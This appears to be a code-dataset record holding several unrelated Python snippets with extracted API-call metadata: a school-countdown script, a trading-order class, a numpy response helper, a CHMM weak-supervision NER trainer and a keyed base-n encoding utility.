] | [((1088, 1104), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (1097, 1104), False, 'import math\n'), ((1214, 1284), 'math.sqrt', 'math.sqrt', (['((obj1.posx - obj2.posx) ** 2 + (obj1.posy - obj2.posy) ** 2)'], {}), '((obj1.posx - obj2.posx) ** 2 + (obj1.posy - obj2.posy) ** 2)\n', (1223, 1284), False, 'import math\n'), ((1491, 1508), 'math.floor', 'math.floor', (['(n / k)'], {}), '(n / k)\n', (1501, 1508), False, 'import math\n'), ((1852, 1867), 'math.sqrt', 'math.sqrt', (['sqrl'], {}), '(sqrl)\n', (1861, 1867), False, 'import math\n'), ((15594, 15640), 'math.sqrt', 'math.sqrt', (['(s_ship.posx ** 2 + s_ship.posy ** 2)'], {}), '(s_ship.posx ** 2 + s_ship.posy ** 2)\n', (15603, 15640), False, 'import math\n'), ((1629, 1645), 'math.cos', 'math.cos', (['(-angle)'], {}), '(-angle)\n', (1637, 1645), False, 'import math\n'), ((1653, 1669), 'math.sin', 'math.sin', (['(-angle)'], {}), '(-angle)\n', (1661, 1669), False, 'import math\n'), ((1676, 1692), 'math.cos', 'math.cos', (['(-angle)'], {}), '(-angle)\n', (1684, 1692), False, 'import math\n'), ((1700, 1716), 'math.sin', 'math.sin', (['(-angle)'], {}), '(-angle)\n', (1708, 1716), False, 'import math\n'), ((6195, 6211), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (6204, 6211), False, 'import math\n'), ((6248, 6264), 'math.sqrt', 'math.sqrt', (['delta'], {}), '(delta)\n', (6257, 6264), False, 'import math\n'), ((10541, 10599), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10551, 10599), False, 'import math\n'), ((10700, 10764), 'math.atan2', 'math.atan2', (['(shipp.posx - targetp.posx)', '(targetp.posy - shipp.posy)'], {}), '(shipp.posx - targetp.posx, targetp.posy - shipp.posy)\n', (10710, 10764), False, 'import math\n'), ((11218, 11265), 'math.sqrt', 'math.sqrt', (['((rock_repel_r - dist) / rock_repel_r)'], {}), '((rock_repel_r - dist) / rock_repel_r)\n', (11227, 11265), False, 'import math\n'), ((12742, 12791), 'math.sqrt', 'math.sqrt', (['((laser_repel_r - dist) / laser_repel_r)'], {}), '((laser_repel_r - dist) / laser_repel_r)\n', (12751, 12791), False, 'import math\n'), ((22579, 22637), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (22589, 22637), False, 'import math\n'), ((23739, 23797), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (23749, 23797), False, 'import math\n'), ((15717, 15763), 'math.sqrt', 'math.sqrt', (['(s_ship.posx ** 2 + s_ship.posy ** 2)'], {}), '(s_ship.posx ** 2 + s_ship.posy ** 2)\n', (15726, 15763), False, 'import math\n'), ((9845, 9903), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (9855, 9903), False, 'import math\n'), ((10103, 10161), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10113, 10161), False, 'import math\n'), ((10361, 10419), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (10371, 10419), False, 'import math\n'), ((11884, 11933), 'math.sqrt', 'math.sqrt', (['((rock_repel_t - toc[0]) / rock_repel_t)'], {}), '((rock_repel_t - toc[0]) / rock_repel_t)\n', (11893, 11933), False, 'import math\n'), ((18214, 18272), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (18224, 18272), False, 'import math\n'), ((18538, 18587), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (18547, 18587), False, 'import math\n'), ((20484, 20542), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (20494, 20542), False, 'import math\n'), ((20808, 20857), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (20817, 20857), False, 'import math\n'), ((14866, 14917), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - toc[0]) / laser_repel_t)'], {}), '((laser_repel_t - toc[0]) / laser_repel_t)\n', (14875, 14917), False, 'import math\n'), ((19350, 19408), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (19360, 19408), False, 'import math\n'), ((19674, 19723), 'math.sqrt', 'math.sqrt', (['((laser_repel_t - time) / laser_repel_t)'], {}), '((laser_repel_t - time) / laser_repel_t)\n', (19683, 19723), False, 'import math\n'), ((13806, 13864), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (13816, 13864), False, 'import math\n'), ((14202, 14260), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (14212, 14260), False, 'import math\n'), ((14599, 14657), 'math.atan2', 'math.atan2', (['(shipp.posx - coords[0])', '(coords[1] - shipp.posy)'], {}), '(shipp.posx - coords[0], coords[1] - shipp.posy)\n', (14609, 14657), False, 'import math\n')] |
from datetime import date, datetime, timedelta
import time
START_DATE = date(2021, 5, 25)
duration = timedelta(days=100)
def countdown():
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print()
print("\tTime until school is out for summer 2021:", end="\n\n")
while event_delta.seconds > 0:
hours, remaining_delta = divmod(event_delta.seconds, 3600)
mins, secs = divmod(remaining_delta, 60)
timer = f"\t{event_delta.days:02d} days {hours:02d} hours {mins:02d} minutes {secs:02d} seconds"
print(timer, end="\r")
time.sleep(1)
event_delta = LAST_DAY_OF_SCHOOL - datetime.now()
print("School's out for summer!")
| [
"datetime.datetime.now",
"datetime.timedelta",
"datetime.date",
"time.sleep"
] | [((73, 90), 'datetime.date', 'date', (['(2021)', '(5)', '(25)'], {}), '(2021, 5, 25)\n', (77, 90), False, 'from datetime import date, datetime, timedelta\n'), ((102, 121), 'datetime.timedelta', 'timedelta', ([], {'days': '(100)'}), '(days=100)\n', (111, 121), False, 'from datetime import date, datetime, timedelta\n'), ((180, 194), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (192, 194), False, 'from datetime import date, datetime, timedelta\n'), ((571, 584), 'time.sleep', 'time.sleep', (['(1)'], {}), '(1)\n', (581, 584), False, 'import time\n'), ((628, 642), 'datetime.datetime.now', 'datetime.now', ([], {}), '()\n', (640, 642), False, 'from datetime import date, datetime, timedelta\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
__title__ = ''
__author__ = 'HaiFeng'
__mtime__ = '2016/8/16'
"""
import time
from py_at.EnumDefine import *
########################################################################
class OrderItem(object):
"""策略信号"""
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.Instrument = ''
self.DateTime = time.strftime('%Y%m%d %H:%Mm:%S', time.localtime(time.time()))
self.Direction = Direction.Buy
self.Offset = Offset.Open
self.Price = 0.0
self.Volume = 0
self.Remark = ''
self.RelationOpenOrders = []
#策略相关
self.AvgEntryPriceShort = 0.0
self.AvgEntryPriceLong = 0.0
self.PositionLong = 0
self.PositionShort = 0
self.EntryDateLong = ''
self.EntryPriceLong = 0.0
self.ExitDateShort = ''
self.ExitPriceShort = 0.0
self.EntryDateShort = ''
self.EntryPriceShort = 0.0
self.ExitDateLong = ''
self.ExitPriceLong = 0.0
self.LastEntryDateShort = ''
self.LastEntryPriceShort = 0.0
self.LastEntryDateLong = ''
self.LastEntryPriceLong = 0.0
self.IndexEntryLong = -1
self.IndexEntryShort = -1
self.IndexLastEntryLong = -1
self.IndexLastEntryShort = -1
self.IndexExitLong = -1
self.IndexExitShort = -1
#----------------------------------------------------------------------
def __str__(self):
""""""
return '{self.Instrument}, {self.DateTime}, {self.Direction}, {self.Offset}, {self.Price}, {self.Volume}, {self.Remark}'.format(self = self) | [
"time.time"
] | [((477, 488), 'time.time', 'time.time', ([], {}), '()\n', (486, 488), False, 'import time\n')] |
from __future__ import print_function, division
import numpy as np
from numpy import identity, dot, zeros, zeros_like
def rf_den_via_rf0(self, rf0, v):
""" Whole matrix of the interacting response via non-interacting response and interaction"""
rf = zeros_like(rf0)
I = identity(rf0.shape[1])
for ir,r in enumerate(rf0):
rf[ir] = dot(np.linalg.inv(I-dot(r,v)), r)
return rf
def rf_den(self, ww):
""" Full matrix interacting response from NAO GW class"""
rf0 = self.rf0(ww)
return rf_den_via_rf0(self, rf0, self.kernel_sq)
| [
"numpy.identity",
"numpy.dot",
"numpy.zeros_like"
] | [((255, 270), 'numpy.zeros_like', 'zeros_like', (['rf0'], {}), '(rf0)\n', (265, 270), False, 'from numpy import identity, dot, zeros, zeros_like\n'), ((278, 300), 'numpy.identity', 'identity', (['rf0.shape[1]'], {}), '(rf0.shape[1])\n', (286, 300), False, 'from numpy import identity, dot, zeros, zeros_like\n'), ((364, 373), 'numpy.dot', 'dot', (['r', 'v'], {}), '(r, v)\n', (367, 373), False, 'from numpy import identity, dot, zeros, zeros_like\n')] |
import os
import logging
import numpy as np
from typing import Optional
import torch
from torch.utils.data import DataLoader
from ..eval import Metric
from .dataset import CHMMBaseDataset
from .dataset import collate_fn as default_collate_fn
logger = logging.getLogger(__name__)
OUT_RECALL = 0.9
OUT_PRECISION = 0.8
class CHMMBaseTrainer:
def __init__(self,
config,
collate_fn=None,
training_dataset=None,
valid_dataset=None,
test_dataset=None,
pretrain_optimizer=None,
optimizer=None):
self._model = None
self._config = config
self._training_dataset = training_dataset
self._valid_dataset = valid_dataset
self._test_dataset = test_dataset
self._collate_fn = collate_fn
self._pretrain_optimizer = pretrain_optimizer
self._optimizer = optimizer
self._init_state_prior = None
self._init_trans_mat = None
self._init_emiss_mat = None
@property
def config(self):
return self._config
@config.setter
def config(self, x):
logger.warning("Updating DirCHMMTrainer.config")
self._config = x
@property
def model(self):
return self._model
def initialize_trainer(self):
"""
Initialize necessary components for training
Note: Better not change the order
Returns
-------
the initialized trainer
"""
self.initialize_matrices()
self.initialize_model()
self.initialize_optimizers()
return self
def initialize_model(self):
raise NotImplementedError
def initialize_matrices(self):
"""
Initialize <HMM> transition and emission matrices
Returns
-------
self
"""
assert self._training_dataset and self._valid_dataset
# inject prior knowledge about transition and emission
self._init_state_prior = torch.zeros(self._config.d_hidden, device=self._config.device) + 1e-2
self._init_state_prior[0] += 1 - self._init_state_prior.sum()
intg_obs = list(map(np.array, self._training_dataset.obs + self._valid_dataset.obs))
# construct/load initial transition matrix
dataset_dir = os.path.split(self._config.train_path)[0]
transmat_path = os.path.join(dataset_dir, "init_transmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(transmat_path):
logger.info("Loading initial transition matrix from disk")
self._init_trans_mat = torch.load(transmat_path)
# if the loaded transmat does not have the proper shape, re-calculate it.
s0_transmat, s1_transmat = self._init_trans_mat.shape
if not (s0_transmat == s1_transmat == self.config.d_obs):
self._init_trans_mat = None
if self._init_trans_mat is None:
self._init_trans_mat = torch.tensor(initialise_transmat(
observations=intg_obs, label_set=self._config.bio_label_types
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial transition matrix")
torch.save(self._init_trans_mat, transmat_path)
# construct/load initial emission matrix
emissmat_path = os.path.join(dataset_dir, "init_emissmat.pt")
if getattr(self._config, "load_init_mat", False):
if os.path.isfile(emissmat_path):
logger.info("Loading initial emission matrix from disk")
self._init_emiss_mat = torch.load(emissmat_path)
# if the loaded emissmat does not have the proper shape, re-calculate it.
s0_emissmat, s1_emissmat, s2_emissmat = self._init_emiss_mat.shape
if not (s0_emissmat == self.config.n_src) and (s1_emissmat == s2_emissmat == self.config.d_obs):
self._init_emiss_mat = None
if self._init_emiss_mat is None:
self._init_emiss_mat = torch.tensor(initialise_emissions(
observations=intg_obs, label_set=self._config.bio_label_types,
sources=self._config.sources, src_priors=self._config.src_priors
)[0], dtype=torch.float)
if getattr(self._config, "save_init_mat", False):
logger.info("Saving initial emission matrix")
torch.save(self._init_emiss_mat, emissmat_path)
return self
def initialize_optimizers(self, optimizer=None, pretrain_optimizer=None):
self._optimizer = self.get_optimizer() if optimizer is None else optimizer
self._pretrain_optimizer = self.get_pretrain_optimizer() if pretrain_optimizer is None else pretrain_optimizer
def get_dataloader(self, dataset, shuffle=False):
if dataset is not None:
dataloader = DataLoader(
dataset=dataset,
batch_size=self._config.lm_batch_size,
collate_fn=self._collate_fn if self._collate_fn is not None else default_collate_fn,
shuffle=shuffle,
drop_last=False
)
return dataloader
else:
logger.error('Dataset is not defined')
raise ValueError("Dataset is not defined!")
def pretrain_step(self, data_loader, optimizer, trans_, emiss_):
raise NotImplementedError
def training_step(self, data_loader, optimizer):
raise NotImplementedError
def train(self):
raise NotImplementedError
def valid(self) -> Metric:
self._model.to(self._config.device)
valid_metrics = self.evaluate(self._valid_dataset)
logger.info("Validation results:")
for k, v in valid_metrics.items():
logger.info(f" {k}: {v:.4f}")
return valid_metrics
def test(self) -> Metric:
self._model.to(self._config.device)
test_metrics = self.evaluate(self._test_dataset)
logger.info("Test results:")
for k, v in test_metrics.items():
logger.info(f" {k}: {v:.4f}")
return test_metrics
def evaluate(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def predict(self, dataset: CHMMBaseDataset):
raise NotImplementedError
def get_pretrain_optimizer(self):
raise NotImplementedError
def get_optimizer(self):
# ----- initialize optimizer -----
raise NotImplementedError
def save(self,
output_dir: Optional[str] = None,
save_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Save model parameters as well as trainer parameters
Parameters
----------
output_dir: model directory
save_optimizer: whether to save optimizer
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
None
"""
output_dir = output_dir if output_dir is not None else self._config.output_dir
logger.info(f"Saving model to {output_dir}")
model_state_dict = self._model.state_dict()
torch.save(model_state_dict, os.path.join(output_dir, f'{model_name}.bin'))
self._config.save(output_dir)
if save_optimizer:
logger.info("Saving optimizer and scheduler")
torch.save(self._optimizer.state_dict(),
os.path.join(output_dir, f"{optimizer_name}.bin"))
torch.save(self._pretrain_optimizer.state_dict(),
os.path.join(output_dir, f"{pretrain_optimizer_name}.bin"))
return None
def load(self,
input_dir: Optional[str] = None,
load_optimizer: Optional[bool] = False,
model_name: Optional[str] = 'chmm',
optimizer_name: Optional[str] = 'chmm-optimizer',
pretrain_optimizer_name: Optional[str] = 'chmm-pretrain-optimizer'):
"""
Load model parameters.
Parameters
----------
input_dir: model directory
load_optimizer: whether load other trainer parameters
model_name: model name (suffix free)
optimizer_name: optimizer name (suffix free)
pretrain_optimizer_name: pretrain optimizer name (suffix free)
Returns
-------
self
"""
input_dir = input_dir if input_dir is not None else self._config.output_dir
if self._model is not None:
logger.warning(f"The original model {type(self._model)} in {type(self)} is not None. "
f"It will be overwritten by the loaded model!")
logger.info(f"Loading model from {input_dir}")
self.initialize_model()
self._model.load_state_dict(torch.load(os.path.join(input_dir, f'{model_name}.bin')))
self._model.to(self.config.device)
if load_optimizer:
logger.info("Loading optimizer and scheduler")
if self._optimizer is None:
self.initialize_optimizers()
if os.path.isfile(os.path.join(input_dir, f"{optimizer_name}.bin")):
self._optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{optimizer_name}.bin"), map_location=self.config.device)
)
else:
logger.warning("Optimizer file does not exist!")
if os.path.isfile(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin")):
self._pretrain_optimizer.load_state_dict(
torch.load(os.path.join(input_dir, f"{pretrain_optimizer_name}.bin"))
)
else:
logger.warning("Pretrain optimizer file does not exist!")
return self
def save_results(self,
output_dir: str,
valid_results: Optional[Metric] = None,
file_name: Optional[str] = 'results',
disable_final_valid: Optional[bool] = False,
disable_test: Optional[bool] = False,
disable_inter_results: Optional[bool] = False) -> None:
"""
Save training (validation) results
Parameters
----------
output_dir: output directory, should be a folder
valid_results: validation results during the training process
file_name: file name
disable_final_valid: disable final validation process (getting validation results of the trained model)
disable_test: disable test process
disable_inter_results: do not save inter-results
Returns
-------
None
"""
if not disable_final_valid:
logger.info("Getting final validation metrics")
valid_metrics = self.valid()
else:
valid_metrics = None
if not disable_test:
logger.info("Getting test metrics.")
test_metrics = self.test()
else:
test_metrics = None
# write validation and test results
result_file = os.path.join(output_dir, f'{file_name}.txt')
logger.info(f"Writing results to {result_file}")
self.write_result(file_path=result_file,
valid_results=valid_results,
final_valid_metrics=valid_metrics,
test_metrics=test_metrics)
if not disable_inter_results:
# save validation inter results
logger.info(f"Saving inter results")
inter_result_file = os.path.join(output_dir, f'{file_name}-inter.pt')
torch.save(valid_results.__dict__, inter_result_file)
return None
@staticmethod
def write_result(file_path: str,
valid_results: Optional[Metric] = None,
final_valid_metrics: Optional[Metric] = None,
test_metrics: Optional[Metric] = None) -> None:
"""
Support functions for saving training results
Parameters
----------
file_path: where to save results
valid_results: validation results during the training process
final_valid_metrics: validation results of the trained model
test_metrics
Returns
-------
"""
with open(file_path, 'w') as f:
if valid_results is not None:
for i in range(len(valid_results)):
f.write(f"[Epoch {i + 1}]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {valid_results[k][i]:.4f}")
f.write("\n")
if final_valid_metrics is not None:
f.write(f"[Best Validation]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {final_valid_metrics[k]:.4f}")
f.write("\n")
if test_metrics is not None:
f.write(f"[Test]\n")
for k in ['precision', 'recall', 'f1']:
f.write(f" {k}: {test_metrics[k]:.4f}")
f.write("\n")
return None
def initialise_startprob(observations,
label_set,
src_idx=None):
"""
calculate initial hidden states (not used in our setup since our sequences all begin from
[CLS], which corresponds to hidden state "O".
:param src_idx: source index
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: probabilities for the initial hidden states
"""
n_src = observations[0].shape[1]
logger.info("Constructing start distribution prior...")
init_counts = np.zeros((len(label_set),))
if src_idx is not None:
for obs in observations:
init_counts[obs[0, src_idx].argmax()] += 1
else:
for obs in observations:
for z in range(n_src):
init_counts[obs[0, z].argmax()] += 1
for i, label in enumerate(label_set):
if i == 0 or label.startswith("B-"):
init_counts[i] += 1
startprob_prior = init_counts + 1
startprob_ = np.random.dirichlet(init_counts + 1E-10)
return startprob_, startprob_prior
# TODO: try to use a more reliable source to start the transition and emission
def initialise_transmat(observations,
label_set,
src_idx=None):
"""
initialize transition matrix
:param src_idx: the index of the source of which the transition statistics is computed.
If None, use all sources
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:return: initial transition matrix and transition counts
"""
logger.info("Constructing transition matrix prior...")
n_src = observations[0].shape[1]
trans_counts = np.zeros((len(label_set), len(label_set)))
if src_idx is not None:
for obs in observations:
for k in range(0, len(obs) - 1):
trans_counts[obs[k, src_idx].argmax(), obs[k + 1, src_idx].argmax()] += 1
else:
for obs in observations:
for k in range(0, len(obs) - 1):
for z in range(n_src):
trans_counts[obs[k, z].argmax(), obs[k + 1, z].argmax()] += 1
# update transition matrix with prior knowledge
for i, label in enumerate(label_set):
if label.startswith("B-") or label.startswith("I-"):
trans_counts[i, label_set.index("I-" + label[2:])] += 1
elif i == 0 or label.startswith("I-"):
for j, label2 in enumerate(label_set):
if j == 0 or label2.startswith("B-"):
trans_counts[i, j] += 1
transmat_prior = trans_counts + 1
# initialize transition matrix with dirichlet distribution
transmat_ = np.vstack([np.random.dirichlet(trans_counts2 + 1E-10)
for trans_counts2 in trans_counts])
return transmat_, transmat_prior
def initialise_emissions(observations,
label_set,
sources,
src_priors,
strength=1000):
"""
initialize emission matrices
:param sources: source names
:param src_priors: source priors
:param label_set: a set of all possible label_set
:param observations: n_instances X seq_len X n_src X d_obs
:param strength: Don't know what this is for
:return: initial emission matrices and emission counts?
"""
logger.info("Constructing emission probabilities...")
obs_counts = np.zeros((len(sources), len(label_set)), dtype=np.float64)
# extract the total number of observations for each prior
for obs in observations:
obs_counts += obs.sum(axis=0)
for source_index, source in enumerate(sources):
# increase p(O)
obs_counts[source_index, 0] += 1
# increase the "reasonable" observations
for pos_index, pos_label in enumerate(label_set[1:]):
if pos_label[2:] in src_priors[source]:
obs_counts[source_index, pos_index] += 1
# construct probability distribution from counts
obs_probs = obs_counts / (obs_counts.sum(axis=1, keepdims=True) + 1E-3)
# initialize emission matrix
matrix = np.zeros((len(sources), len(label_set), len(label_set)))
for source_index, source in enumerate(sources):
for pos_index, pos_label in enumerate(label_set):
# Simple case: set P(O=x|Y=x) to be the recall
recall = 0
if pos_index == 0:
recall = OUT_RECALL
elif pos_label[2:] in src_priors[source]:
_, recall = src_priors[source][pos_label[2:]]
matrix[source_index, pos_index, pos_index] = recall
for pos_index2, pos_label2 in enumerate(label_set):
if pos_index2 == pos_index:
continue
elif pos_index2 == 0:
precision = OUT_PRECISION
elif pos_label2[2:] in src_priors[source]:
precision, _ = src_priors[source][pos_label2[2:]]
else:
precision = 1.0
# Otherwise, we set the probability to be inversely proportional to the precision
# and the (unconditional) probability of the observation
error_prob = (1 - recall) * (1 - precision) * (0.001 + obs_probs[source_index, pos_index2])
# We increase the probability for boundary errors (i.e. I-ORG -> B-ORG)
if pos_index > 0 and pos_index2 > 0 and pos_label[2:] == pos_label2[2:]:
error_prob *= 5
# We increase the probability for errors with same boundary (i.e. I-ORG -> I-GPE)
if pos_index > 0 and pos_index2 > 0 and pos_label[0] == pos_label2[0]:
error_prob *= 2
matrix[source_index, pos_index, pos_index2] = error_prob
error_indices = [i for i in range(len(label_set)) if i != pos_index]
error_sum = matrix[source_index, pos_index, error_indices].sum()
matrix[source_index, pos_index, error_indices] /= (error_sum / (1 - recall) + 1E-5)
emission_priors = matrix * strength
emission_probs = matrix
return emission_probs, emission_priors
| [
"logging.getLogger",
"torch.load",
"os.path.join",
"os.path.split",
"os.path.isfile",
"numpy.random.dirichlet",
"torch.save",
"torch.utils.data.DataLoader",
"torch.zeros"
] | [((254, 281), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (271, 281), False, 'import logging\n'), ((14610, 14650), 'numpy.random.dirichlet', 'np.random.dirichlet', (['(init_counts + 1e-10)'], {}), '(init_counts + 1e-10)\n', (14629, 14650), True, 'import numpy as np\n'), ((2409, 2454), 'os.path.join', 'os.path.join', (['dataset_dir', '"""init_transmat.pt"""'], {}), "(dataset_dir, 'init_transmat.pt')\n", (2421, 2454), False, 'import os\n'), ((3473, 3518), 'os.path.join', 'os.path.join', (['dataset_dir', '"""init_emissmat.pt"""'], {}), "(dataset_dir, 'init_emissmat.pt')\n", (3485, 3518), False, 'import os\n'), ((11491, 11535), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{file_name}.txt"""'], {}), "(output_dir, f'{file_name}.txt')\n", (11503, 11535), False, 'import os\n'), ((2035, 2097), 'torch.zeros', 'torch.zeros', (['self._config.d_hidden'], {'device': 'self._config.device'}), '(self._config.d_hidden, device=self._config.device)\n', (2046, 2097), False, 'import torch\n'), ((2343, 2381), 'os.path.split', 'os.path.split', (['self._config.train_path'], {}), '(self._config.train_path)\n', (2356, 2381), False, 'import os\n'), ((2528, 2557), 'os.path.isfile', 'os.path.isfile', (['transmat_path'], {}), '(transmat_path)\n', (2542, 2557), False, 'import os\n'), ((3592, 3621), 'os.path.isfile', 'os.path.isfile', (['emissmat_path'], {}), '(emissmat_path)\n', (3606, 3621), False, 'import os\n'), ((5008, 5201), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'dataset', 'batch_size': 'self._config.lm_batch_size', 'collate_fn': '(self._collate_fn if self._collate_fn is not None else default_collate_fn)', 'shuffle': 'shuffle', 'drop_last': '(False)'}), '(dataset=dataset, batch_size=self._config.lm_batch_size,\n collate_fn=self._collate_fn if self._collate_fn is not None else\n default_collate_fn, shuffle=shuffle, drop_last=False)\n', (5018, 5201), False, 'from torch.utils.data import DataLoader\n'), ((7581, 7626), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{model_name}.bin"""'], {}), "(output_dir, f'{model_name}.bin')\n", (7593, 7626), False, 'import os\n'), ((11975, 12024), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{file_name}-inter.pt"""'], {}), "(output_dir, f'{file_name}-inter.pt')\n", (11987, 12024), False, 'import os\n'), ((12037, 12090), 'torch.save', 'torch.save', (['valid_results.__dict__', 'inter_result_file'], {}), '(valid_results.__dict__, inter_result_file)\n', (12047, 12090), False, 'import torch\n'), ((16361, 16403), 'numpy.random.dirichlet', 'np.random.dirichlet', (['(trans_counts2 + 1e-10)'], {}), '(trans_counts2 + 1e-10)\n', (16380, 16403), True, 'import numpy as np\n'), ((2673, 2698), 'torch.load', 'torch.load', (['transmat_path'], {}), '(transmat_path)\n', (2683, 2698), False, 'import torch\n'), ((3351, 3398), 'torch.save', 'torch.save', (['self._init_trans_mat', 'transmat_path'], {}), '(self._init_trans_mat, transmat_path)\n', (3361, 3398), False, 'import torch\n'), ((3735, 3760), 'torch.load', 'torch.load', (['emissmat_path'], {}), '(emissmat_path)\n', (3745, 3760), False, 'import torch\n'), ((4546, 4593), 'torch.save', 'torch.save', (['self._init_emiss_mat', 'emissmat_path'], {}), '(self._init_emiss_mat, emissmat_path)\n', (4556, 4593), False, 'import torch\n'), ((7829, 7878), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{optimizer_name}.bin"""'], {}), "(output_dir, f'{optimizer_name}.bin')\n", (7841, 7878), False, 'import os\n'), ((7965, 8023), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(output_dir, f'{pretrain_optimizer_name}.bin')\n", (7977, 8023), False, 'import os\n'), ((9193, 9237), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{model_name}.bin"""'], {}), "(input_dir, f'{model_name}.bin')\n", (9205, 9237), False, 'import os\n'), ((9485, 9533), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{optimizer_name}.bin"""'], {}), "(input_dir, f'{optimizer_name}.bin')\n", (9497, 9533), False, 'import os\n'), ((9830, 9887), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(input_dir, f'{pretrain_optimizer_name}.bin')\n", (9842, 9887), False, 'import os\n'), ((9616, 9664), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{optimizer_name}.bin"""'], {}), "(input_dir, f'{optimizer_name}.bin')\n", (9628, 9664), False, 'import os\n'), ((9979, 10036), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(input_dir, f'{pretrain_optimizer_name}.bin')\n", (9991, 10036), False, 'import os\n')] |
from random import Random
from collections_extended import setlist
# The version of seeding to use for random
SEED_VERSION = 2
# Common alphabets to use
ALPHANUM = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
BASE58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def shuffle(key, x):
random = Random(key)
random.shuffle(x)
def key_gen(key, base):
'''Generate values from the key.
This will indefinitely generate integers in [0, base).
key is used to initialize random, so that the "random" number generated are
the same each time for a given key. This turns a key of any length into an
"infinitely" long key without simply cycling over the key.
'''
random = Random(key)
while True:
value = random.randint(0, base-1)
yield value
def encode_base_n(num, base, min_length=0):
'''Convert an integer into a list of integers storing the number in base base.
If a minimum length is specified, the result will be 0-padded.
'''
out = []
while num > 0 or len(out) < min_length:
num, remainder = divmod(num, base)
out.append(remainder)
return out
def decode_base_n(int_list, base):
'''Convert a list of numbers representing a number in base base to an integer.'''
out = 0
for index, num in enumerate(int_list):
if num >= base or num < 0:
raise ValueError
out += (base ** index) * num
return out
def calc_check_digits(int_list, base, num_check_chars):
checksum_base = base ** num_check_chars
checksum_value = sum(int_list) % checksum_base
return encode_base_n(checksum_value, base, min_length=num_check_chars)
def add_check_digits(int_list, base, num_check_chars):
'''Calculate a checksum for int_list and translate into a number of base base
made up of num_check_chars digits.
Args:
int_list: A list of integers >= 0 and < base
base: The number of characters in the alphabet
num_check_chars: The number of check characters to return
Returns:
A list of integers that represent the checksum in base base.
'''
check_digits = calc_check_digits(int_list, base, num_check_chars)
return int_list + check_digits
def eval_check_digits(decrypted_ints, base, num_check_chars):
'''Evaluate the check digits in decrypted_ints.
Args:
decrypted_ints: A list of integers >=0 and < base (the result of add_check_digits)
Returns:
The decrypted_ints without the check digits
Raises:
ValueError: if the check digits don't match
'''
if num_check_chars == 0:
return decrypted_ints
int_list = decrypted_ints[:-num_check_chars]
check_digits = decrypted_ints[-num_check_chars:]
if calc_check_digits(int_list, base, num_check_chars) != check_digits:
raise ValueError()
return int_list
